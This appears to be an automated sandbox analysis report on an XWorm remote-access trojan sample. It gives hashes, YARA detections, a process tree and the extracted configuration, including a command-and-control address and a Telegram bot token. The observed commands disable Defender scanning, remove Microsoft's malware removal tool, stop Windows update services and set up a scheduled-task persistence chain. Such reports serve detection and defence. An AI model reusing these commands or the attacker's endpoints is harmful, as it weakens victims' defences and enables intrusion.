Analysis
-
max time kernel
149s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
29-03-2024 02:32
Static task
static1
Behavioral task
behavioral1
Sample
a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
Resource
win7-20240220-en
General
-
Target
a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
-
Size
455KB
-
MD5
c8d9593196962fa5d706a207c16674cd
-
SHA1
686a8e674e6615d5cd91f7b2cba0c755054b3f69
-
SHA256
a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d
-
SHA512
5ddae80780c6091bfe0ab5e29bc63732c08ce34f677fc341366dcecf6db9e1bd2e0ed24cfe57eface0d19c6f46010f47eb2d74888b91a503dae00651c4a756bf
-
SSDEEP
12288:XcTpGLwWpFGIWFfDtaY4S0LEy7w0iymL/:XOpEwiFYxsEyHiyK
Malware Config
Extracted
xworm
5.1
104.194.9.116:7000
bUezpCDHVjUVS3W9
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot6330888131:AAE5ycZdHuNqV5SVYhHeCfRENn6GuCjwXjs/sendMessage?chat_id=1046049845
Signatures
-
Detect Xworm Payload 5 IoCs
resource yara_rule behavioral1/memory/2472-8-0x0000000000400000-0x000000000040E000-memory.dmp family_xworm behavioral1/memory/2472-10-0x0000000000400000-0x000000000040E000-memory.dmp family_xworm behavioral1/memory/2472-13-0x0000000000400000-0x000000000040E000-memory.dmp family_xworm behavioral1/memory/2472-15-0x0000000000400000-0x000000000040E000-memory.dmp family_xworm behavioral1/memory/2472-17-0x0000000000400000-0x000000000040E000-memory.dmp family_xworm -
Detects Windows executables referencing non-Windows User-Agents 5 IoCs
resource yara_rule behavioral1/memory/2472-8-0x0000000000400000-0x000000000040E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral1/memory/2472-10-0x0000000000400000-0x000000000040E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral1/memory/2472-13-0x0000000000400000-0x000000000040E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral1/memory/2472-15-0x0000000000400000-0x000000000040E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral1/memory/2472-17-0x0000000000400000-0x000000000040E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA -
Detects executables packed with or use KoiVM 1 IoCs
resource yara_rule behavioral1/memory/2184-3-0x0000000000B30000-0x0000000000B94000-memory.dmp INDICATOR_EXE_Packed_KoiVM -
Detects executables using Telegram Chat Bot 5 IoCs
resource yara_rule behavioral1/memory/2472-8-0x0000000000400000-0x000000000040E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TelegramChatBot behavioral1/memory/2472-10-0x0000000000400000-0x000000000040E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TelegramChatBot behavioral1/memory/2472-13-0x0000000000400000-0x000000000040E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TelegramChatBot behavioral1/memory/2472-15-0x0000000000400000-0x000000000040E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TelegramChatBot behavioral1/memory/2472-17-0x0000000000400000-0x000000000040E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TelegramChatBot -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 5 IoCs
pid Process 2480 csocjo.exe 2548 iltrhn.exe 1568 vbmfxw.exe 2692 griwpi.exe 2384 CasPol.exe -
Loads dropped DLL 20 IoCs
pid Process 2472 installutil.exe 1684 WerFault.exe 1684 WerFault.exe 1684 WerFault.exe 1684 WerFault.exe 1684 WerFault.exe 2472 installutil.exe 2472 installutil.exe 2472 installutil.exe 3048 WerFault.exe 3048 WerFault.exe 3048 WerFault.exe 3048 WerFault.exe 3048 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2592 cmd.exe -
Uses the VBS compiler for execution 1 TTPs
-
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe aspnet_wp.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2184 set thread context of 2472 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 28 PID 1568 set thread context of 3060 1568 vbmfxw.exe 47 PID 2692 set thread context of 1948 2692 griwpi.exe 49 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 940 sc.exe 1792 sc.exe 1996 sc.exe 2128 sc.exe 2768 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2292 schtasks.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 620 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 2548 iltrhn.exe 3060 aspnet_wp.exe 1752 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe Token: SeDebugPrivilege 2472 installutil.exe Token: SeDebugPrivilege 2548 iltrhn.exe Token: SeDebugPrivilege 1752 powershell.exe Token: SeShutdownPrivilege 2232 powercfg.exe Token: SeShutdownPrivilege 2208 powercfg.exe Token: SeShutdownPrivilege 2216 powercfg.exe Token: SeShutdownPrivilege 2200 powercfg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2184 wrote to memory of 2472 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 28 PID 2184 wrote to memory of 2472 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 28 PID 2184 wrote to memory of 2472 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 28 PID 2184 wrote to memory of 2472 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 28 PID 2184 wrote to memory of 2472 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 28 PID 2184 wrote to memory of 2472 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 28 PID 2184 wrote to memory of 2472 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 28 PID 2184 wrote to memory of 2472 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 28 PID 2184 wrote to memory of 2472 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 28 PID 2184 wrote to memory of 2472 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 28 PID 2184 wrote to memory of 2472 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 28 PID 2184 wrote to memory of 2472 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 28 PID 2184 wrote to memory of 2600 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 29 PID 2184 wrote to memory of 2600 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 29 PID 2184 wrote to memory of 2600 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 29 PID 2472 wrote to memory of 2480 2472 installutil.exe 31 PID 2472 wrote to memory of 2480 2472 installutil.exe 31 PID 2472 wrote to memory of 2480 2472 installutil.exe 31 PID 2472 wrote to memory of 2480 2472 installutil.exe 31 PID 2480 wrote to memory of 1712 2480 csocjo.exe 32 PID 2480 wrote to memory of 1712 2480 csocjo.exe 32 PID 2480 wrote to memory of 1712 2480 csocjo.exe 32 PID 2480 wrote to memory of 1712 2480 csocjo.exe 32 PID 2480 wrote to memory of 1712 2480 csocjo.exe 32 PID 2480 wrote to memory of 1712 2480 csocjo.exe 32 PID 2480 wrote to memory of 1712 2480 csocjo.exe 32 PID 2480 wrote to memory of 1712 2480 csocjo.exe 32 PID 2480 wrote to memory of 1712 2480 csocjo.exe 32 PID 2480 wrote to memory of 2348 2480 csocjo.exe 33 PID 2480 wrote to memory of 2348 2480 csocjo.exe 33 PID 2480 wrote to memory of 2348 2480 csocjo.exe 33 PID 2480 wrote to memory of 2348 2480 csocjo.exe 33 PID 2480 wrote to memory of 2348 2480 csocjo.exe 33 PID 2480 wrote to memory of 2348 2480 csocjo.exe 33 PID 2480 wrote to memory of 2348 2480 csocjo.exe 33 PID 2480 wrote to memory of 2348 2480 csocjo.exe 33 PID 2480 wrote to memory of 2348 2480 csocjo.exe 33 PID 2480 wrote to memory of 988 2480 csocjo.exe 34 PID 2480 wrote to memory of 988 2480 csocjo.exe 34 PID 2480 wrote to memory of 988 2480 csocjo.exe 34 PID 2480 wrote to memory of 448 2480 csocjo.exe 35 PID 2480 wrote to memory of 448 2480 csocjo.exe 35 PID 2480 wrote to memory of 448 2480 csocjo.exe 35 PID 2480 wrote to memory of 448 2480 csocjo.exe 35 PID 2480 wrote to memory of 448 2480 csocjo.exe 35 PID 2480 wrote to memory of 448 2480 csocjo.exe 35 PID 2480 wrote to memory of 448 2480 csocjo.exe 35 PID 2480 wrote to memory of 448 2480 csocjo.exe 35 PID 2480 wrote to memory of 448 2480 csocjo.exe 35 PID 2480 wrote to memory of 2220 2480 csocjo.exe 36 PID 2480 wrote to memory of 2220 2480 csocjo.exe 36 PID 2480 wrote to memory of 2220 2480 csocjo.exe 36 PID 2480 wrote to memory of 2220 2480 csocjo.exe 36 PID 2480 wrote to memory of 2220 2480 csocjo.exe 36 PID 2480 wrote to memory of 2220 2480 csocjo.exe 36 PID 2480 wrote to memory of 2220 2480 csocjo.exe 36 PID 2480 wrote to memory of 2220 2480 csocjo.exe 36 PID 2480 wrote to memory of 2220 2480 csocjo.exe 36 PID 2480 wrote to memory of 1228 2480 csocjo.exe 37 PID 2480 wrote to memory of 1228 2480 csocjo.exe 37 PID 2480 wrote to memory of 1228 2480 csocjo.exe 37 PID 2480 wrote to memory of 1228 2480 csocjo.exe 37 PID 2480 wrote to memory of 1228 2480 csocjo.exe 37 PID 2480 wrote to memory of 1228 2480 csocjo.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe"C:\Users\Admin\AppData\Local\Temp\a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"2⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Users\Admin\AppData\Local\Temp\csocjo.exe"C:\Users\Admin\AppData\Local\Temp\csocjo.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"4⤵PID:1712
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"4⤵PID:2348
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe"4⤵PID:988
-
-
C:\Program Files\Windows Mail\wab.exe"C:\Program Files\Windows Mail\wab.exe"4⤵PID:448
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"4⤵PID:2220
-
-
C:\Program Files\Windows Media Player\wmplayer.exe"C:\Program Files\Windows Media Player\wmplayer.exe"4⤵PID:1228
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"4⤵PID:752
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"4⤵PID:2996
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"4⤵PID:688
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2480 -s 21604⤵
- Loads dropped DLL
PID:1684
-
-
-
C:\Users\Admin\AppData\Local\Temp\iltrhn.exe"C:\Users\Admin\AppData\Local\Temp\iltrhn.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
C:\Users\Admin\AppData\Local\Temp\vbmfxw.exe"C:\Users\Admin\AppData\Local\Temp\vbmfxw.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1568 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3060 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵PID:1448
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
- Drops file in Windows directory
PID:2356
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
PID:1792
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:1996
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
PID:2128
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
PID:2768
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
PID:940
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵PID:1968
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1568 -s 21084⤵
- Loads dropped DLL
PID:3048
-
-
-
C:\Users\Admin\AppData\Local\Temp\griwpi.exe"C:\Users\Admin\AppData\Local\Temp\griwpi.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2692 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"4⤵PID:1948
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "CasPol" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe"5⤵
- Loads dropped DLL
PID:2592 -
C:\Windows\SysWOW64\chcp.comchcp 650016⤵PID:1208
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:620
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "CasPol" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
PID:2292
-
-
C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe"C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe"6⤵
- Executes dropped EXE
PID:2384
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2692 -s 21044⤵
- Loads dropped DLL
PID:2172
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2184 -s 7322⤵PID:2600
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
105KB
MD5ac93f60717f1fee8c678e624f54852ee
SHA1d9c9828396d19a7f2920af68a4692409f16beaa9
SHA2561fa79bf14d80519f7965a44dcc1f69ec1d24e83eea2927b474c3545e65062f24
SHA5129ff7dfe9c8bc2ae775a97227990f332d8b799fbb4235eea7c73756a5359841d355805d1b624b40fe8f7e864c997a604d3c10ad1fa1182deb5842ab77aad9b1b7
-
Filesize
756KB
MD5d76027fe4cfd48c7f8999c796e50e731
SHA15026422e84bf445e2d141529e2b808187a30d9f6
SHA256148da274864c690a7c01119e025bdc0ab94fa9c110c30afb42e51b1c990a2799
SHA5122e2c4a5319a61555913648702ddcfb8b40d548dcfda1a536a2e85f9cb85d25d9a463743dc866f86b4de99fd10f9c402def424b9e8a203189518f45e924b89d2d
-
Filesize
393KB
MD53f3a51617811e9581aba50376599efa6
SHA19b26aa73f43a4db9b216b90d1aa3e2e4d602fde8
SHA2565f3403e13e316d9320d46233e9f62b183623c46ec80c6c55139efdd72c5ada37
SHA5129ad5cfb29281dd462b726c7ee239926f83050181fe4f6c3e9057e51df65ae7f850cecbf1cb453287720314275335df36bb8d5299d09a1f73329a5b9292db3ee3
-
Filesize
16.5MB
MD5d01b812c108576056594805b6e9e7064
SHA1290fc3e50cf13a1595f1ba3357285153ac98834d
SHA2569a6ac9acc3267fc22ecd8872e3e9d863dce608d609ee06fb0769b599ce669ec4
SHA512d3709b4a6760e149bcd774f7648857a47161e7144530e3d1ae700b33861837d494d646bb8accd3980b3ccb955682c9c1ebe2c3f22371fb9566f669c48fb09be4
-
Filesize
3.1MB
MD586e00d529b3b454a84b942ac916211e3
SHA1021c733e5448436b384bf0d3a0ba81f4d0d93f9a
SHA25630e01b261cb5d7524a303cdbe9d177fc05d74279642e4a87b46ee70045e68d53
SHA5129a08379b35a3bf1699b925c6dbfc6e85123f1155e567929eaff3683e5e9f196a16775e3a2f6a7585f7c0f0f201ef4be009cda5cf94b160742642145837c3de1e